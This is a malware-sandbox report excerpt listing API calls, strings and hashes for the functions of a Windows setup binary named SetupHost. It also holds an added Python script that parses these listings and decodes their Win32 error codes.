• Opcode ID: 65087ca7c1719f9fb33cce986ca79df36ed36bce223d3f18b222ab63aeadcb0e
• Instruction ID: cab9f32cbe11de54ac55d5427620675437a90f6c5dba8209c526e4baab87d275
• Opcode Fuzzy Hash: 65087ca7c1719f9fb33cce986ca79df36ed36bce223d3f18b222ab63aeadcb0e
• Instruction Fuzzy Hash: 6DF0E236B0060227D7119DF98C847AB7A68BB41370F140238BA22D62D0D590D80281B0
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 699adaed1c8c1913ef5e1a6cdc157d2021b85dfc6bc1561a5be886a9ebf13213
• Instruction ID: d68b80c884438bfe8d5912bb6b5ff2f870ca796398f06761f2778f47109cba99
• Opcode Fuzzy Hash: 699adaed1c8c1913ef5e1a6cdc157d2021b85dfc6bc1561a5be886a9ebf13213
• Instruction Fuzzy Hash: 79A0023214CF4CDB52501A867C19932779DD1D6663A5940A1D514029115972A815D5D5
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40fc4049a4aa8d589dfb5797985288a47fa0faa5e07a9fad35fc7a3b5749f509
• Instruction ID: 02cdc943423eba2a79ecd7185af980ecd5f1e2fab46d921f52f95976ad817f08
• Opcode Fuzzy Hash: 40fc4049a4aa8d589dfb5797985288a47fa0faa5e07a9fad35fc7a3b5749f509
• Instruction Fuzzy Hash: C1A0223200CB0CC302000282B808833338CC0C0223A0000E0C80002A000832A800C0C8
APIs
• SetLastError.KERNEL32(00000020,?,00000000), ref: 0051E30B
• GetLastError.KERNEL32(?,?,00000000), ref: 0051E369
  • Part of subcall function 0051DFE4: SetLastError.KERNEL32(00000006,?,00000000,00000000,0051E358,?,?,00000000), ref: 0051E003
• GetLastError.KERNEL32(?,?,00000000), ref: 0051E361
• GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 0051E431
• GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 0051E459
• FlushFileBuffers.KERNEL32(00000000,?,00000000), ref: 0051E4B2
• GetLastError.KERNEL32(?,00000000), ref: 0051E4BC
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E516
• HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E51D
• GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 0051E54A
• HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E551
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E5E2
• HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E5E9
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E606
• HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E60D
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E620
• HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E627
• memset.MSVCRT ref: 0051E64A
• GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0051E654
• HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0051E65B
• SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0051E666
  • Part of subcall function 00521EE7: GetProcessHeap.KERNEL32(00000008,00000168,?,00000000,00000000,?,?,00000000), ref: 00521F0B
  • Part of subcall function 00521EE7: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00521F12
  • Part of subcall function 00521EE7: memset.MSVCRT ref: 00521F2D
  • Part of subcall function 00521EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 00521F54
  • Part of subcall function 00521EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 00521F66
  • Part of subcall function 00521EE7: UuidCreate.RPCRT4(00000008), ref: 00521F8B
  • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000104,00000000), ref: 00521FA3
  • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000011C,00000000), ref: 00521FB4
  • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000134,00000000), ref: 00521FC8
  • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000), ref: 00521FDA
Strings
Similarity
• API ID: Heap$ErrorLast$Process$Free$CountCriticalInitializeSectionSpin$Create$Eventmemset$AllocBuffersFileFlushUuid
• String ID: Fail to flush file buffers$Fail to read WIM header$Fail to update WIM header$The existing WIM file became corrupted$WIMCloseWIM
• API String ID: 1391722268-2486278283
• Opcode ID: 8d4eee748810fb67d400d1ee47a395a3af524a5455c3273658dcd036807213a0
• Instruction ID: e452de2bd151538e362a9140859f131cb5bf61a7f9c6c5677650a79de6b21509
• Opcode Fuzzy Hash: 8d4eee748810fb67d400d1ee47a395a3af524a5455c3273658dcd036807213a0
• Instruction Fuzzy Hash: 8791E23470072267EB1577706C6FBBF6DAA7FE6701F090818BC02972D2DFA88C819695
APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,00000000), ref: 0051F213
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F26F
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F3DA
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F3E1
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F3EF
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F3F6
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F406
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F40D
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F41C
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F423
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F433
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F43A
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F453
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F45A
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F472
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F479
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F488
• HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F48F
• SetLastError.KERNEL32(00000057,?,00000000,00000000), ref: 0051F4A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$ErrorLastTime$FileSystem
                                                                                                                        • String ID: %I64u$0x%08X$WIM\IMAGE[*]\CREATIONTIME\HIGHPART$WIM\IMAGE[*]\CREATIONTIME\LOWPART
                                                                                                                        • API String ID: 1882856403-1289715265
                                                                                                                        • Opcode ID: ec3b39004d81d64389dccce423a4d0bab9c33a76e70780911c2ec012fa5b9232
                                                                                                                        • Instruction ID: 39f3ea17036b687a99460c7359756c6f21ef758ff251fa87e76650d2b09d83bf
                                                                                                                        • Opcode Fuzzy Hash: ec3b39004d81d64389dccce423a4d0bab9c33a76e70780911c2ec012fa5b9232
                                                                                                                        • Instruction Fuzzy Hash: 75A19CB5E0022AABDF109BE4DD49AEEBFB9BF58700F144426F901E3290D77499459BA0
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 00529336
                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,00000000,00000000,00000000), ref: 005293E7
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA,?), ref: 005293FF
                                                                                                                        • __aulldiv.LIBCMT ref: 00529493
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 005294F3
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 005294FA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 00529607
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 0052960E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 00529745
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 0052974C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ErrorFreeLast$Alloc__aulldivmemset
                                                                                                                        • String ID: ParseChunkRegionInternal
                                                                                                                        • API String ID: 71407944-2127954582
                                                                                                                        • Opcode ID: 4f49b9f650ece71e20813752269d043eea214b66d76a8efe01a79fc37cccf9f9
                                                                                                                        • Instruction ID: db35db805f4041378e7ef7fe729adedb267d041f6a2ee86ca10de1e59bae297a
                                                                                                                        • Opcode Fuzzy Hash: 4f49b9f650ece71e20813752269d043eea214b66d76a8efe01a79fc37cccf9f9
                                                                                                                        • Instruction Fuzzy Hash: 64D1AE71B003299BDB14DFA8E895BAEBBB4FF59710F144529E905EB3C1D7749C008B94
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00521CBE: GetProcessHeap.KERNEL32(?,00100010,00000000,?,00000001,?,?,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D22
                                                                                                                          • Part of subcall function 00521CBE: HeapAlloc.KERNEL32(00000000,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D29
                                                                                                                          • Part of subcall function 00521CBE: GetProcessHeap.KERNEL32(00000001,00100010,00000000,?,00000001,?,?,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D75
                                                                                                                          • Part of subcall function 00521CBE: HeapAlloc.KERNEL32(00000000,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D7C
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0052D2B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D2CA
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0052D391
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D3A4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0052D53B
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0052D55C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0052D56F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0052D5A5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0052D5B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0052D5BF
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0052D5D2
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0052D5E0
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0052D61A
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D632
                                                                                                                          • Part of subcall function 0052CEB0: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00528B82), ref: 0052CECB
                                                                                                                          • Part of subcall function 0052CEB0: LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,00528B82), ref: 0052CEE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Last$Heap$Process$AllocCriticalSectionStatus$CloseEnterFreeHandleLeave
                                                                                                                        • String ID: AddCaptureNodeToImage$GetMetadataPadding
                                                                                                                        • API String ID: 1694025836-3639775197
                                                                                                                        • Opcode ID: 6b2abd00b9f58242228a5278324c726c0eee74ab94f49048868cdba39739442c
                                                                                                                        • Instruction ID: c764d3b4388c050c69fbcd77a93d7f01d4e0c78e927da403c79b6dc01fb24b52
                                                                                                                        • Opcode Fuzzy Hash: 6b2abd00b9f58242228a5278324c726c0eee74ab94f49048868cdba39739442c
                                                                                                                        • Instruction Fuzzy Hash: ECD1AE75604722ABD724DF65E858A2BBFB5BFCA314F008929F855972D0DB30EC04DBA1
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000001,00000400,?,00000100,00000000,00000000,?,?), ref: 0054B4C7
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0054B52E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentFormatMessageThread
                                                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                        • API String ID: 2411632146-3173542853
                                                                                                                        • Opcode ID: 1499f884504bc4cd40094b09176ba91246468139898d809ca55cd3c7a584f6f1
                                                                                                                        • Instruction ID: c4fd6b0b1be37d9b5fca367a6433ea948c4e826dd4020e3c9881bab621ec4db6
                                                                                                                        • Opcode Fuzzy Hash: 1499f884504bc4cd40094b09176ba91246468139898d809ca55cd3c7a584f6f1
                                                                                                                        • Instruction Fuzzy Hash: 8F51F1B1900304ABEF309F259C1DEE7BEB8FB98308F10495BB10692253E776E940CB50
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0054E312
                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll), ref: 0054E357
                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-eventing-provider-l1-1-0.dll), ref: 0054E370
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventWrite), ref: 0054E382
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventRegister), ref: 0054E397
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EventUnregister), ref: 0054E3AC
                                                                                                                        • EventRegister.ADVAPI32 ref: 0054E409
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule$EventRegisterVersion
                                                                                                                        • String ID: EventRegister$EventUnregister$EventWrite$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
                                                                                                                        • API String ID: 3544251202-1971782300
                                                                                                                        • Opcode ID: 829fd7ee4bf60e4cb0a5274f553b7aadc8e5623d8e21afc9c6eb7da36fe5939c
                                                                                                                        • Instruction ID: 88edd3528cb87b243aa2a8b47ac101577ceb85884f3cc903b4f686ffe95881ce
                                                                                                                        • Opcode Fuzzy Hash: 829fd7ee4bf60e4cb0a5274f553b7aadc8e5623d8e21afc9c6eb7da36fe5939c
                                                                                                                        • Instruction Fuzzy Hash: D541C474A003189BDB228F14AC5ABDEBFB4BF59719F14449AE809A3250D7709E45DFA0
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 005002CA
                                                                                                                        • GetLastError.KERNEL32 ref: 005002F8
                                                                                                                        • SetLastError.KERNEL32(000004C7), ref: 0050030B
                                                                                                                        • GetLastError.KERNEL32 ref: 005004C2
                                                                                                                        Strings
                                                                                                                        • DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s], xrefs: 0050043B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s]
                                                                                                                        • API String ID: 1452528299-3938585608
                                                                                                                        • Opcode ID: bf5121761db16e7303eebd720182b40ead121fcdefb3fd791632589b516155c0
                                                                                                                        • Instruction ID: f875005f0df37f304d6e802721344aadd02cd4dc33564233346de27ac9424234
                                                                                                                        • Opcode Fuzzy Hash: bf5121761db16e7303eebd720182b40ead121fcdefb3fd791632589b516155c0
                                                                                                                        • Instruction Fuzzy Hash: C6618A71A0030AEFDB10DFA5D988BAEBBB5BF48311F109929E909972D0D770EE00DB54
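Added example (not code from Joe Sandbox, from the report, or from the analysed sample): a small Python parser that reads the API lines of a function block like the ones above into structured records, then pulls out the imports resolved at run time (the GetModuleHandleW / GetProcAddress targets in the EventRegister block) and decodes the Win32 error codes passed to SetLastError in the DeletePathDirectoryCallback block. The `• Api.MODULE(args), ref: ADDR` line layout and the "Part of subcall function" prefix are assumed from this page; the winerror.h mapping covers only the codes that appear here, and the sample input below is copied from the blocks above.

```python
"""Turn a Joe Sandbox function-block API listing into structured records.

Added example, not Joe Sandbox or sample code. Line format assumed from the report:
    • Api.MODULE(arg,arg,...), ref: ADDR
    • Api.MODULE ref: ADDR
    •   Part of subcall function 00521CBE: Api.MODULE(...), ref: ADDR
"""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")

# winerror.h values for the codes passed to SetLastError on this page.
WIN32_ERRORS = {
    0x000: "ERROR_SUCCESS",
    0x057: "ERROR_INVALID_PARAMETER",
    0x4C7: "ERROR_CANCELLED",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument tokens as printed ("?" = unknown)
    ref: int                 # call-site address
    subcall: Optional[int]   # set when the line is "Part of subcall function X"


def parse_block(text: str) -> List[ApiCall]:
    """Parse every API line in one function block; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def arg_value(token: str) -> Optional[int]:
    """Decode a printed argument: 8-digit hex word -> int; '?' or a string -> None."""
    return int(token, 16) if HEX_ARG.match(token) else None


def dynamic_imports(calls: List[ApiCall]) -> dict:
    """Modules and export names resolved at run time, in call order."""
    loaders = ("GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA")
    modules, procs = [], []
    for c in calls:
        if c.api in loaders and c.args and c.args[0] != "?" and arg_value(c.args[0]) is None:
            modules.append(c.args[0])
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if name != "?" and arg_value(name) is None:   # literal export name
                procs.append(name)
    return {"modules": modules, "procs": procs}


def decode_set_last_error(calls: List[ApiCall]):
    """Map each SetLastError(code) call site to its winerror.h name."""
    out = []
    for c in calls:
        if c.api == "SetLastError" and c.args:
            code = arg_value(c.args[0])
            if code is not None:
                out.append((c.ref, code, WIN32_ERRORS.get(code, "UNKNOWN")))
    return out


# Sample input copied from the SetupHost function blocks in this report.
ETW_BLOCK = """\
• GetVersionExW.KERNEL32(?), ref: 0054E312
• GetModuleHandleW.KERNEL32(advapi32.dll), ref: 0054E357
• GetModuleHandleW.KERNEL32(api-ms-win-eventing-provider-l1-1-0.dll), ref: 0054E370
• GetProcAddress.KERNEL32(00000000,EventWrite), ref: 0054E382
• GetProcAddress.KERNEL32(00000000,EventRegister), ref: 0054E397
• GetProcAddress.KERNEL32(00000000,EventUnregister), ref: 0054E3AC
• EventRegister.ADVAPI32 ref: 0054E409
"""

ERROR_BLOCK = """\
  • Part of subcall function 00521CBE: HeapAlloc.KERNEL32(00000000,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D29
• SetLastError.KERNEL32(00000057), ref: 005002CA
• GetLastError.KERNEL32 ref: 005002F8
• SetLastError.KERNEL32(000004C7), ref: 0050030B
• GetLastError.KERNEL32 ref: 005004C2
"""

if __name__ == "__main__":
    print(dynamic_imports(parse_block(ETW_BLOCK)))
    for ref, code, name in decode_set_last_error(parse_block(ERROR_BLOCK)):
        print(f"{ref:08X}: SetLastError(0x{code:X}) = {name}")
```

The dynamic-import check keys on a literal export name in the second GetProcAddress argument; a sample that resolves by ordinal or builds the name at run time shows a hex word or `?` there instead, so an empty `procs` list is not proof that nothing is resolved dynamically.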
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE2C2
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE219
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE223
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE257
                                                                                                                        • GetLastError.KERNEL32(?,005002A6,00000000,00500624,005004E0,?), ref: 004FE25F
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,005002A6,00000000,00500624,005004E0,?), ref: 004FE27D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00500624,005004E0,?), ref: 004FE2A8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 004FE2AF
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00500624,005004E0,?), ref: 004FE2B6
                                                                                                                        Strings
                                                                                                                        • WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x, xrefs: 004FE287
                                                                                                                        • WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x, xrefs: 004FE22D
                                                                                                                        • WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x, xrefs: 004FE267
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                        • String ID: WdsRemoveDirectory: Unable to clear attributes on [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to prepare path [%s]; GLE = 0x%x$WdsRemoveDirectory: Unable to remove directory [%s]; GLE = 0x%x
                                                                                                                        • API String ID: 686246089-2509674698
                                                                                                                        • Opcode ID: f69e0d07b0eb66dfcb6c35910579cd95b5f60723d7cad32771faf0a5d83f3f42
                                                                                                                        • Instruction ID: 283ef76bf34fc3634de49139c0e2acf22c44e5ead37475ae2593f80f5f91f115
                                                                                                                        • Opcode Fuzzy Hash: f69e0d07b0eb66dfcb6c35910579cd95b5f60723d7cad32771faf0a5d83f3f42
                                                                                                                        • Instruction Fuzzy Hash: CF1108317443087BD72027F76C5EF3B3A5DDB98B27F150466FA01923A1EA688804A569
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,?,00000000), ref: 0053D073
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,?,00000000), ref: 0053D098
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0053D09F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000200,00000000,00000001,?,00000000), ref: 0053D0AA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0053D0B1
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000001,?,00000000,00000200,00000200), ref: 0053D104
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000200,00000200), ref: 0053D190
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000200,00000200), ref: 0053D197
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0053D1D4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0053D1DB
                                                                                                                        • CloseHandle.KERNEL32(00000001,00000001,?,00000000), ref: 0053D1E7
